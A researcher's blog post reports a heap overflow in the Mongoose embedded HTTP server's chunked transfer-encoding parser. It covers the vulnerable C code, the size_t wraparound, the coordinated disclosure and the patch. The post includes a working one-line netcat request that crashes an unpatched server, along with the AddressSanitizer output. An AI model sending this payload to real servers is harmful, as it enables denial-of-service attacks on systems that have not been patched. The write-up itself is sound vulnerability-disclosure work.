Sometimes when stuck with some time to burn in an airport I like to poke around C code to learn new tricks and go bugspotting as a type of “sudoku for computer nerds”. This post describes a heap overflow I found in the popular Mongoose HTTP Server for embedded systems.

I was going down the list of most popular projects on GitHub written in C when I spotted Mongoose; I like embedded systems so figured I’d take a quick noodle around. A brief google suggested Cisco Talos had surfaced some bugs a few years back, so I ran a git diff to see what code had the most changes since Cisco’s audit:

$ git diff --stat=170 101afbc HEAD | grep '\.c'  | grep src
 src/mg_coap.c                           |   597 ++++
 src/mg_dns.c                            |   377 +++
 src/mg_dns_server.c                     |    71 +
 src/mg_http.c                           |  3068 ++++++++++++++++++++
 src/mg_http_cgi.c                       |   513 ++++
 src/mg_http_ssi.c                       |   193 ++
 src/mg_http_webdav.c                    |   269 ++
 src/mg_http_websocket.c                 |   517 ++++
 src/mg_mqtt.c                           |   493 ++++
 src/mg_mqtt_server.c                    |   194 ++
 src/mg_net.c                            |  1179 ++++++++
 src/mg_net_if.c                         |    53 +
 src/mg_net_if_null.c                    |   141 +
 src/mg_net_if_socket.c                  |   582 ++++
 src/mg_net_if_socks.c                   |   237 ++
 src/mg_resolv.c                         |   292 ++
 src/mg_sntp.c                           |   288 ++
 src/mg_socks.c                          |   159 ++
 src/mg_ssl_if_mbedtls.c                 |   511 ++++
 src/mg_ssl_if_openssl.c                 |   397 +++
 src/mg_uri.c                            |   261 ++
 src/mg_util.c                           |   344 +++

It’s clear that there were new features added into the web server, and I decided to focus on those. In particular, support for chunked transfer encoding appeared to have been added, which caught my eye as something quite simple to skim through, yet has been a source of bugs in many HTTP servers over the years due to subtle bugs in maintaining state and doing correct arithmetic at the server side.

Chunked Encoding

Chunked encoding is a method by which an HTTP server can send multiple independent parts of a response and a client can receive and process those chunks without having the entirety of the response data. HTTP/2 has completely done away with chunked encoding, providing it’s entirely own mechanisms for achieving the same purpose.

The following snippet shows what you might see in a proxy or on the wire, with a set of length fields, followed by actual data:

HTTP/1.1 200 OK 
Content-Type: text/plain 
Transfer-Encoding: chunked


The Bug

I quickly found a chain of calls from the more generic server entrypoint mg_http_handler(), all the way down to where the server parsed the attacker-controlled data and turned an ASCII text representation into a number and used it as a length field. Anywhere a program parses attacker-controllable lengths and uses them for memory operations is a point of interest.

The following is taken from the top-level mg_http_handler() function as it parses an inbound HTTP request:

// ---snip--
    if (req_len > 0 &&
        (s = mg_get_http_header(hm, "Transfer-Encoding")) != NULL &&
        mg_vcasecmp(s, "chunked") == 0) {
      mg_handle_chunked(nc, hm, io->buf + req_len, io->len - req_len);
// ---snip--

In this code we see a check for the Transfer-Encoding header, followed by checking whether it’s value is chunked. If so, we call into mg_handle_chunked(), seen in the next code snippet:

MG_INTERNAL size_t mg_handle_chunked(struct mg_connection *nc,
                                     struct http_message *hm, char *buf,
                                     size_t blen) {
  struct mg_http_proto_data *pd = mg_http_get_proto_data(nc);
  char *data;
  size_t i, n, data_len, body_len, zero_chunk_received = 0;
  /* Find out piece of received data that is not yet reassembled */
  body_len = (size_t) pd->chunk.body_len;
  assert(blen >= body_len);

  /* Traverse all fully buffered chunks */
  for (i = body_len; ////[1]////
       (n = mg_http_parse_chunk(buf + i, blen - i, &data, &data_len)) > 0; 
       i += n) {
    /* Collapse chunk data to the rest of HTTP body */
    memmove(buf + body_len, data, data_len); ////[2]////
    body_len += data_len;
    hm->body.len = body_len;

The key pieces here are that in [1], we loop over the length of the body of the HTTP request, calling mg_http_parse_chunk() until we run out of data. The interesting bit to note is that this function can potentially write to the data_len variable, which is later used as the length of a memmove() call seen in [2].

So the question becomes: can we provide data which causes a memmove() with an unreasonable value and causes an overflow? Here is the function which decides that:

 * Parse chunked-encoded buffer. Return 0 if the buffer is not encoded, or
 * if it's incomplete. If the chunk is fully buffered, return total number of
 * bytes in a chunk, and store data in `data`, `data_len`.
static size_t mg_http_parse_chunk(char *buf, size_t len, char **chunk_data,
                                  size_t *chunk_len) {
  unsigned char *s = (unsigned char *) buf;
  size_t n = 0; /* scanned chunk length */
  size_t i = 0; /* index in s */

  /* Scan chunk length. That should be a hexadecimal number. */
  while (i < len && isxdigit(s[i])) { ////[1]////
    n *= 16;
    n += (s[i] >= '0' && s[i] <= '9') ? s[i] - '0' : tolower(s[i]) - 'a' + 10;

  /* Skip new line */
  if (i == 0 || i + 2 > len || s[i] != '\r' || s[i + 1] != '\n') {
    return 0;
  i += 2;

  /* Record where the data is */
  *chunk_data = (char *) s + i;
  *chunk_len = n; ////[2]////

  /* Skip data */
  i += n; ////[3]////

  /* Skip new line */
  if (i == 0 || i + 2 > len || s[i] != '\r' || s[i + 1] != '\n') {
    return 0; ////[4]////
  return i + 2;

At [1], we loop over the supplied chunked length data, ensuring that each character is a valid hex value using isxdigit(), and keeping a running total in variable n of type size_t. We increment the index i for each character. Note than we can basically make n take on any value here.

Following some easily achievable checks, we see a write of n to the crucial chunk_len pointer in [2].

At [3], we increment the data index i by our parsed chunk size variable n.

Finally, assuming we can pass the checks at [4], the function returns with a non-zero value and we can control the overflow length.

The issue here is quite simple: a very large value of n will wrap i in [3] and ensure it is a sane enough value to pass all the later checks. This does, however, mean that the overflow is of a very very large value, as seen later in the Proof-of-Concept.

Proof Of Concept

The following demonstrate this issue in a very simple way:

  • Compile the big_upload example, with ASan enabled (mongoose/examples/big_upload)
  • Run the following:
    $ echo "GET / HTTP/1.1\r\nTransfer-Encoding: Chunked\r\n\r\n3\r\nMoz\r\nfffffffffffffffe\r\nDeveloper\r\n0\r\n\r\n" | nc localhost 8000
  • Observe the following ASan output:
==29700==ERROR: AddressSanitizer: negative-size-param: (size=-2)
    #0 0x10e40d208 in __asan_memmove (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x51208)
    #1 0x10e3389ad in mg_handle_chunked mongoose.c:6215
    #2 0x10e336067 in mg_http_handler mongoose.c:6408
    #3 0x10e31eb69 in mg_call mongoose.c:2404
    #4 0x10e36060c in mg_recv_tcp mongoose.c:2935
    #5 0x10e3221f7 in mg_do_recv mongoose.c:2892
    #6 0x10e321dc4 in mg_if_can_recv_cb mongoose.c:2898
    #7 0x10e32b380 in mg_mgr_handle_conn mongoose.c:3856
    #8 0x10e32dfd1 in mg_socket_if_poll mongoose.c:4047
    #9 0x10e320785 in mg_mgr_poll mongoose.c:2598
    #10 0x10e2f7e52 in main big_upload.c:95
    #11 0x7fffe1a94234 in start (libdyld.dylib:x86_64+0x5234)

0x61b0000000c8 is located 72 bytes inside of 1460-byte region [0x61b000000080,0x61b000000634)
allocated by thread T0 here:
    #0 0x10e415230 in wrap_realloc (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59230)
    #1 0x10e313851 in mbuf_resize mongoose.c:1549
    #2 0x10e32204b in mg_do_recv mongoose.c:2885
    #3 0x10e321dc4 in mg_if_can_recv_cb mongoose.c:2898
    #4 0x10e32b380 in mg_mgr_handle_conn mongoose.c:3856
    #5 0x10e32dfd1 in mg_socket_if_poll mongoose.c:4047
    #6 0x10e320785 in mg_mgr_poll mongoose.c:2598
    #7 0x10e2f7e52 in main big_upload.c:95
    #8 0x7fffe1a94234 in start (libdyld.dylib:x86_64+0x5234)

SUMMARY: AddressSanitizer: negative-size-param (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x51208) in __asan_memmove
[1]    29700 abort      ./big_upload

Here, we see that our very large chunk length value has been parsed, has passed all the checks, and been used in the memmove(), resulting in an out-of-bounds write. ASan has suggested that it’s a negative value, as that’s a very reasonable explanation for passing in such a large value - I guess it’s more likely that -2 has propagated rather than someone intended to copy 18 quintillion bytes.

Exploitation of a bug like this is very non-trivial. The process crashes due to an out-of-bounds access fairly quickly, resulting in no opportunity to make use of overwritten data. Bugs like this are known as a wild copy, (Interestingly, the linked article also references a chunked-encoding bug) and are typically exploited by causing the overflow to start, but then interrupting it using another thread or possibly a signal handler. Given that Mongoose is more of a library than a standalone HTTP server, it’s hard to say what it may be built into which could increase chances of exploitation. I’m no Chris Evans, so I’ll leave exploitation there.


I reached out to Mongoose via their help form, and recieved a quick response from the CTO. A patch was issued within a matter of days, and pushed out to their customers. The patch limits the length of the string that can be parsed as a header to 6 chars (therefore, 0xFFFFFF), which ultimately fixes the specific issue I called out. No CVE or advisory was released for this bug.